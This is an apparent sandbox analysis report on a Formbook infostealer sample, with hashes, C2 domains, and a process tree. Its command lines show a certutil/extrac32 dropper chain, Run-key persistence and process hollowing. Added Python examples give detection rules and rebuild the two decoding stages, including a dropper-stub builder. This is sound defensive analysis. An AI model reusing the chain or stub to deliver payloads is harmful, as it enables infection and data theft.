Analysis

max time kernel: 149s
max time network: 133s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64 arch:x86 image:win7-20240508-en locale:en-us os:windows7-x64 system
submitted: 25-06-2024 17:13
Static task: static1
Behavioral task: behavioral1
Sample: wise_deposit_note__1114218690__3287491072__en.cmd
Resource: win7-20240508-en
General

Target: wise_deposit_note__1114218690__3287491072__en.cmd
Size: 2.4MB
MD5: 42323f7609e2e5c56add77d01e27432f
SHA1: e5262c46781a8c58aaee00a529ed7597dbb2b698
SHA256: 4cb31951ae2b4f8b86b532c25762252f28525f55061d8d09a356a9c8f12029b2
SHA512: 0814feee3013a4409c3171f30dc9d9d4ffe5626e6ba28a257163fa8f26380751fbd5ba7077e47e9bcd59d8b852b50822fb3383c9a6366b8619db7627d9ded44d
SSDEEP: 24576:IPHN8ur54cKt8AdV30Z3ZRYwVxrhWHmmV/MBm54hRCKxBJxsv:IPHSur5M8Ar30JnrQLMEBv
Malware Config

Extracted: formbook
Version: 4.1
Campaign: ca63
C2 domains:
themaxrichth.online
lhzshb.com
isacarrceramics.online
duhochanquoc.website
apexmedia.pro
33311.pro
x2mjbu8gg.shop
dashcreative.online
nifle.shop
hora.lol
rclrwa.asia
aviation-training-sqj.top
a9659a62.vip
uspgh.work
hhol5.top
jinkaida-cn.cn
watchwedding.com
728ym.lat
gillieron.swiss
bingsne.online
professionaljournalism.com
senior-living-15150.bond
chatsio.com
dr-jordan.site
sador.xyz
nagaways.online
552357.pro
domainupdate.site
3v5u21668.shop
dh76044.vip
cineflickapp.online
ht31a.vip
workingcat.online
9h6db.shop
evallc.net
sun20win.digital
683ym.lat
retrosystem.fun
bgkamil.xyz
androidmobiledk.today
gsptx.online
onlineit.sbs
violetnuit.shop
kyusgwh2.top
vdqgj.asia
helpmepeas.net
4399game.asia
tent-homes-10133.bond
moki.dev
raildriver.net
lkjuy.xyz
presentdadsmatter.shop
amp-kopi77i2.xyz
cyber-security-onli.bond
rtpcmbet27.xyz
80lrlaenant8.life
urostatingr.shop
xn--fiq73f39fx0y2hq.work
zc041.xyz
34-health.shop
yunhaicm.asia
domain-2.buzz
money1lifecoachingservice.net
5301ulovp.website
siasstudios.com
Signatures

Formbook payload 3 IoCs
YARA rule "formbook" matched in:
- behavioral1/memory/2264-59-0x00000000031B0000-0x00000000041B0000-memory.dmp
- behavioral1/memory/2264-62-0x00000000031B0000-0x00000000041B0000-memory.dmp
- behavioral1/memory/1900-65-0x0000000000080000-0x00000000000AF000-memory.dmp

Executes dropped EXE 9 IoCs
Processes (pid process):
- 1984 alpha.exe
- 2456 alpha.exe
- 2492 kn.exe
- 2512 alpha.exe
- 2568 kn.exe
- 2768 Audio.pif
- 2488 alpha.exe
- 2480 alpha.exe
- 2844 yrblzjxP.pif

Loads dropped DLL 15 IoCs
Processes (pid process, with repeat counts):
- 1700 cmd.exe (x5)
- 2456 alpha.exe (x1)
- 2512 alpha.exe (x1)
- 2768 Audio.pif (x2)
- 1008 WerFault.exe (x6)

Adds Run key to start application 2 TTPs 1 IoCs
Processes:
- Audio.pif: Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\Pxjzlbry = "C:\\Users\\Public\\Pxjzlbry.url"

Suspicious use of SetThreadContext 3 IoCs
Processes (source PID process -> target PID process):
- PID 2768 Audio.pif set thread context of PID 2844 yrblzjxP.pif
- PID 2264 colorcpl.exe set thread context of PID 1096 Explorer.EXE
- PID 1900 netsh.exe set thread context of PID 1096 Explorer.EXE

Program crash 1 IoCs
Processes:
- 1008 WerFault.exe, target PID 2844 yrblzjxP.pif
Script User-Agent 1 IoCs
Uses a User-Agent string associated with a script host/environment. The string below is the default User-Agent sent by the WinHTTP WinHttpRequest COM object (WinHttp.WinHttpRequest.5.1) when the caller does not set its own, which is why it is typical of script-driven and loader HTTP traffic rather than a browser.
Processes:
- flow 4, HTTP User-Agent header: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
- 2768 Audio.pif

Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes (pid process, with repeat counts):
- 2768 Audio.pif (x1)
- 2264 colorcpl.exe (x2)
- 1900 netsh.exe (x23)

Suspicious behavior: MapViewOfSection 5 IoCs
Processes (pid process, with repeat counts):
- 2264 colorcpl.exe (x3)
- 1900 netsh.exe (x2)

Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
- Token: SeDebugPrivilege, 2264 colorcpl.exe
- Token: SeShutdownPrivilege, 1096 Explorer.EXE
- Token: SeDebugPrivilege, 1900 netsh.exe

Suspicious use of WriteProcessMemory 58 IoCs
Processes (source PID process -> target PID process, with repeat counts):
- 1700 cmd.exe -> 2000 extrac32.exe (x3)
- 1700 cmd.exe -> 1984 alpha.exe (x3)
- 1984 alpha.exe -> 2860 extrac32.exe (x3)
- 1700 cmd.exe -> 2456 alpha.exe (x3)
- 2456 alpha.exe -> 2492 kn.exe (x3)
- 1700 cmd.exe -> 2512 alpha.exe (x3)
- 2512 alpha.exe -> 2568 kn.exe (x3)
- 1700 cmd.exe -> 2768 Audio.pif (x4)
- 1700 cmd.exe -> 2488 alpha.exe (x3)
- 1700 cmd.exe -> 2480 alpha.exe (x3)
- 2768 Audio.pif -> 2844 yrblzjxP.pif (x6)
- 2844 yrblzjxP.pif -> 1008 WerFault.exe (x4)
- 2768 Audio.pif -> 1768 extrac32.exe (x4)
- 2768 Audio.pif -> 2264 colorcpl.exe (x5)
- 1096 Explorer.EXE -> 1900 netsh.exe (x4)
- 1900 netsh.exe -> 744 cmd.exe (x4)
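The signatures above describe a chain that is easy to write detection logic for: extrac32 copying cmd.exe and certutil.exe out of System32, a renamed certutil running -decodehex from C:\Users\Public, a Run value that points at a .url file under C:\Users\Public, and a .pif in C:\Users\Public\Libraries starting a Windows binary that is then hollowed. The following is an added example, not part of this report or of any product: the EVENTS list is constructed telemetry in a Sysmon-like shape (EventID 1 = process create, EventID 13 = registry value set) built from the report's process tree and Run-key IoC, using the report's PIDs and command lines plus one benign certutil event as a control. Field names follow Sysmon; nothing here parses real event logs.

```python
"""Triage rules for the extrac32/certutil dropper chain in this report.

Added example, not part of the sandbox report. EVENTS is constructed
telemetry (Sysmon-like field names) built from the report's process tree
and Run-key IoC; the benign certutil event (pid 4242) is a control.
"""
import re
from dataclasses import dataclass

PUBLIC = "c:\\users\\public"
WINDIR = "c:\\windows\\"
COPIED_LOLBINS = {"cmd.exe", "certutil.exe"}
EXTRAC32_COPY = re.compile(
    r'extrac32(?:\.exe)?\s+/C\s+/Y\s+(?P<src>\S+)\s+"?(?P<dst>[^"\s]+)', re.I)


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def norm(path: str) -> str:
    """Collapse the doubled backslashes the script uses and lower-case."""
    return path.replace("\\\\", "\\").lower()


def rule_extrac32_copies_lolbin(ev):
    """extrac32 /C /Y used to copy cmd.exe or certutil.exe out of C:\\Windows."""
    if ev["EventID"] != 1:
        return None
    m = EXTRAC32_COPY.search(ev["CommandLine"])
    if not m:
        return None
    src, dst = norm(m["src"]), norm(m["dst"])
    if src.rsplit("\\", 1)[-1] in COPIED_LOLBINS and not dst.startswith(WINDIR):
        return Finding("extrac32_copies_lolbin", ev["ProcessId"], f"{src} -> {dst}")
    return None


def rule_decodehex_outside_windows(ev):
    """-decodehex run from an image outside C:\\Windows, i.e. a renamed certutil.
    On real Sysmon data also match OriginalFileName == CertUtil.exe."""
    if ev["EventID"] != 1 or "-decodehex" not in ev["CommandLine"].lower():
        return None
    image = norm(ev["Image"])
    if not image.startswith(WINDIR):
        return Finding("decodehex_outside_windows", ev["ProcessId"], image)
    return None


def rule_run_key_to_url_in_public(ev):
    """Run value whose data is a .url file under C:\\Users\\Public."""
    if ev["EventID"] != 13:
        return None
    target, data = norm(ev["TargetObject"]), norm(ev["Details"])
    if "\\currentversion\\run\\" in target and data.startswith(PUBLIC) and data.endswith(".url"):
        return Finding("run_key_to_url_in_public", ev["ProcessId"], f"{target} = {data}")
    return None


def rule_public_pif_spawns_windows_binary(ev):
    """A .pif under C:\\Users\\Public starting a Windows binary: the shape of
    the Audio.pif -> colorcpl.exe step that precedes SetThreadContext."""
    if ev["EventID"] != 1:
        return None
    parent = norm(ev.get("ParentImage", ""))
    if parent.startswith(PUBLIC) and parent.endswith(".pif") and norm(ev["Image"]).startswith(WINDIR):
        return Finding("public_pif_spawns_windows_binary", ev["ProcessId"], f"{parent} -> {norm(ev['Image'])}")
    return None


RULES = [rule_extrac32_copies_lolbin, rule_decodehex_outside_windows,
         rule_run_key_to_url_in_public, rule_public_pif_spawns_windows_binary]

# Constructed telemetry mirroring the report's process tree (PIDs from the report).
EVENTS = [
    {"EventID": 1, "ProcessId": 1700, "Image": r"C:\Windows\system32\cmd.exe",
     "CommandLine": r'cmd /c "C:\Users\Admin\AppData\Local\Temp\wise_deposit_note__1114218690__3287491072__en.cmd"'},
    {"EventID": 1, "ProcessId": 2000, "Image": r"C:\Windows\System32\extrac32.exe",
     "CommandLine": r'C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"'},
    {"EventID": 1, "ProcessId": 2860, "Image": r"C:\Windows\system32\extrac32.exe",
     "CommandLine": r"extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe"},
    {"EventID": 1, "ProcessId": 2492, "Image": r"C:\Users\Public\kn.exe",
     "CommandLine": r'C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\wise_deposit_note__1114218690__3287491072__en.cmd" "C:\\Users\\Public\\Audio.mp4" 9'},
    {"EventID": 1, "ProcessId": 2264, "Image": r"C:\Windows\SysWOW64\colorcpl.exe",
     "CommandLine": r"C:\Windows\System32\colorcpl.exe", "ParentImage": r"C:\Users\Public\Libraries\Audio.pif"},
    {"EventID": 13, "ProcessId": 2768, "Image": r"C:\Users\Public\Libraries\Audio.pif",
     "TargetObject": r"\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\Pxjzlbry",
     "Details": r"C:\Users\Public\Pxjzlbry.url"},
    # Benign control: certutil run from its real location for a hash check.
    {"EventID": 1, "ProcessId": 4242, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -hashfile C:\tools\setup.msi SHA256"},
]


def triage(events):
    """Run every rule over every event and return all findings."""
    return [f for ev in events for rule in RULES if (f := rule(ev)) is not None]


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(f"[{finding.rule}] pid={finding.pid} {finding.detail}")
```

The rules key on where a binary runs from rather than on its file name, which is the point of this chain: alpha.exe and kn.exe are byte-for-byte cmd.exe and certutil.exe, so name-based allow-lists for LOLBins do not see them, while the copy step itself (extrac32 writing a System32 binary into a user-writable path) and the later -decodehex from C:\Users\Public are both unusual enough to alert on.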
Processes

C:\Windows\Explorer.EXE (PID 1096)
  command line: C:\Windows\Explorer.EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe (PID 1700)
    command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\wise_deposit_note__1114218690__3287491072__en.cmd"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\extrac32.exe (PID 2000)
      command line: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"

    C:\Users\Public\alpha.exe (PID 1984)
      command line: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\extrac32.exe (PID 2860)
        command line: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

    C:\Users\Public\alpha.exe (PID 2456)
      command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\wise_deposit_note__1114218690__3287491072__en.cmd" "C:\\Users\\Public\\Audio.mp4" 9
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

      C:\Users\Public\kn.exe (PID 2492)
        command line: C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\wise_deposit_note__1114218690__3287491072__en.cmd" "C:\\Users\\Public\\Audio.mp4" 9
        - Executes dropped EXE

    C:\Users\Public\alpha.exe (PID 2512)
      command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

      C:\Users\Public\kn.exe (PID 2568)
        command line: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
        - Executes dropped EXE

    C:\Users\Public\Libraries\Audio.pif (PID 2768)
      command line: C:\Users\Public\Libraries\Audio.pif
      - Executes dropped EXE
      - Loads dropped DLL
      - Adds Run key to start application
      - Suspicious use of SetThreadContext
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory

      C:\Users\Public\Libraries\yrblzjxP.pif (PID 2844)
        command line: C:\Users\Public\Libraries\yrblzjxP.pif
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WerFault.exe (PID 1008)
          command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 36
          - Loads dropped DLL
          - Program crash

      C:\Windows\SysWOW64\extrac32.exe (PID 1768)
        command line: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Audio.pif C:\\Users\\Public\\Libraries\\Pxjzlbry.PIF

      C:\Windows\SysWOW64\colorcpl.exe (PID 2264)
        command line: C:\Windows\System32\colorcpl.exe
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken

    C:\Users\Public\alpha.exe (PID 2488)
      command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
      - Executes dropped EXE

    C:\Users\Public\alpha.exe (PID 2480)
      command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Audio.mp4" / A / F / Q / S
      - Executes dropped EXE

  C:\Windows\SysWOW64\netsh.exe (PID 1900)
    command line: "C:\Windows\SysWOW64\netsh.exe"
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe (PID 744)
      command line: /c del "C:\Windows\SysWOW64\colorcpl.exe"
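The two kn.exe invocations in the tree carry the payload out of the .cmd file itself: certutil -decodehex takes an optional trailing CRYPT_STRING_* type that it passes to CryptStringToBinary, and the values used here are 9 (CRYPT_STRING_BASE64X509CRLHEADER: base64 between "-----BEGIN X509 CRL-----" and "-----END X509 CRL-----" lines, with anything before the header, such as the batch stub, skipped) and then 12 (CRYPT_STRING_HEXRAW: bare hex). That mapping comes from the Win32 constants, not from the report, but the report's file sizes agree with it: the 2.4MB .cmd base64-decodes to the 1.7MB Audio.mp4, which hex-decodes to the 890KB Audio.pif. The script below is an added example, not part of the report and not the sample's own code: it re-implements both stages so the final stage can be carved and hashed offline, and builds a constructed stand-in .cmd (stub lines taken from the process tree, SAMPLE_PAYLOAD a made-up MZ-prefixed blob rather than a real PE) to run against. The whitespace tolerance in decode_type12 is this script's choice.

```python
"""Re-implementation of the two certutil -decodehex stages in the process tree.

Added example, not part of the report. Type 9 = CRYPT_STRING_BASE64X509CRLHEADER,
type 12 = CRYPT_STRING_HEXRAW (Win32 CryptStringToBinary constants; the
mapping is inferred, the report only shows the numbers). SAMPLE_PAYLOAD and
the .cmd text built here are constructed; the real sample is not reproduced.
"""
import base64
import binascii
import hashlib
import re

BEGIN = "-----BEGIN X509 CRL-----"
END = "-----END X509 CRL-----"

# Constructed stand-in for the final payload (not a real PE, just an MZ prefix).
SAMPLE_PAYLOAD = b"MZ" + bytes(range(256)) * 4


def decode_type9(text: str) -> bytes:
    """Stage 1 (type 9): base64 body between the X509 CRL header lines.
    Text before the header (the batch stub) is ignored."""
    m = re.search(re.escape(BEGIN) + r"(.*?)" + re.escape(END), text, re.S)
    if m is None:
        raise ValueError("no X509 CRL header block in input")
    body = re.sub(r"\s+", "", m.group(1))
    return base64.b64decode(body, validate=True)


def decode_type12(data: bytes) -> bytes:
    """Stage 2 (type 12): raw hex to bytes. Whitespace is stripped first;
    that leniency is this script's choice, not a claim about certutil."""
    return binascii.unhexlify(re.sub(rb"\s+", b"", data))


def carve(cmd_text: str) -> dict:
    """Run both stages and summarise the result the way a triage note would."""
    stage1 = decode_type9(cmd_text)          # what Audio.mp4 would contain
    stage2 = decode_type12(stage1)           # what Audio.pif would contain
    return {
        "stage1": stage1,
        "stage2": stage2,
        "is_mz": stage2[:2] == b"MZ",
        "sha256": hashlib.sha256(stage2).hexdigest(),
    }


def build_sample_cmd(payload: bytes) -> str:
    """Constructed dropper text: a batch stub (command lines taken from the
    report's process tree) followed by the hex-then-base64 encoded payload."""
    hexraw = binascii.hexlify(payload)            # stage-2 input (HEXRAW)
    b64 = base64.b64encode(hexraw).decode()       # stage-1 input (base64)
    wrapped = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    stub = [
        "@echo off",
        r'C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"',
        r"C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe",
        r'C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\wise_deposit_note__1114218690__3287491072__en.cmd" "C:\\Users\\Public\\Audio.mp4" 9',
        r'C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12',
        "exit /b",
    ]
    return "\n".join(stub + [BEGIN, wrapped, END, ""])


if __name__ == "__main__":
    result = carve(build_sample_cmd(SAMPLE_PAYLOAD))
    print(f"stage1: {len(result['stage1'])} bytes of hex, "
          f"stage2: {len(result['stage2'])} bytes, MZ={result['is_mz']}, "
          f"sha256={result['sha256']}")
```

Run against a real sample of this family, carve() gives the stage-2 hash without executing anything, so it can be compared with the Audio.pif hash in the Downloads list below; the size relationship (stage1 is exactly twice stage2) is a quick check that the type-12 guess is right before looking at the bytes.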
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Public\Audio.mp4
  Filesize: 1.7MB
  MD5: 19c1e12dd929495409539244b0ed93c7
  SHA1: 4cfa1823732b5b7357ddb1932d3b1547c7227619
  SHA256: 26de6e62d11c5b463d2077c56f11c4bfddaa8e83200ab1facc29e478e15f11ff
  SHA512: 6b09493e2a26f8aa43e2cf34ab5973b7ab28b6ab95ad014d767bb7b4f9bb541c12f013a53c42b9f8931a304105f7da486b51749c453021d234303336fd82a2b4

C:\Users\Public\Libraries\Audio.pif
  Filesize: 890KB
  MD5: a0af268716f0954964b48a4ac5c44b08
  SHA1: f80f8c5083002d8e9484a45d21221e5c7f0160dc
  SHA256: 8d49b42445b075555360a8809710d34bc35d8658ced4ed1a062b6d4c2e7be2e6
  SHA512: 3f6588e1b76450cd72711b505ff81072f7055de76abcd5dab5bcc03d7a91b214422152f470ff8ffce73cbe8501e75dff6dd60371ebf7da7a6927741c09279692

C:\Users\Public\kn.exe (extrac32 copy of C:\Windows\System32\certutil.exe, per the process tree)
  Filesize: 1.1MB
  MD5: ec1fd3050dbc40ec7e87ab99c7ca0b03
  SHA1: ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
  SHA256: 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
  SHA512: 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

\Users\Public\Libraries\yrblzjxP.pif
  Filesize: 66KB
  MD5: c116d3604ceafe7057d77ff27552c215
  SHA1: 452b14432fb5758b46f2897aeccd89f7c82a727d
  SHA256: 7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
  SHA512: 9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

\Users\Public\alpha.exe (extrac32 copy of C:\Windows\System32\cmd.exe, per the process tree)
  Filesize: 337KB
  MD5: 5746bd7e255dd6a8afa06f7c42c1ba41
  SHA1: 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
  SHA256: db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
  SHA512: 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Memory dumps (pid-index-range):
  memory/1096-74-0x00000000077F0000-0x0000000007981000-memory.dmp: 1.6MB
  memory/1900-63-0x0000000001160000-0x000000000117B000-memory.dmp: 108KB
  memory/1900-65-0x0000000000080000-0x00000000000AF000-memory.dmp: 188KB
  memory/2264-59-0x00000000031B0000-0x00000000041B0000-memory.dmp: 16.0MB
  memory/2264-62-0x00000000031B0000-0x00000000041B0000-memory.dmp: 16.0MB
  memory/2768-34-0x0000000000400000-0x00000000004E7000-memory.dmp: 924KB
  memory/2844-44-0x0000000000400000-0x0000000001400000-memory.dmp: 16.0MB
  memory/2844-47-0x0000000000400000-0x000000000041A000-memory.dmp: 104KB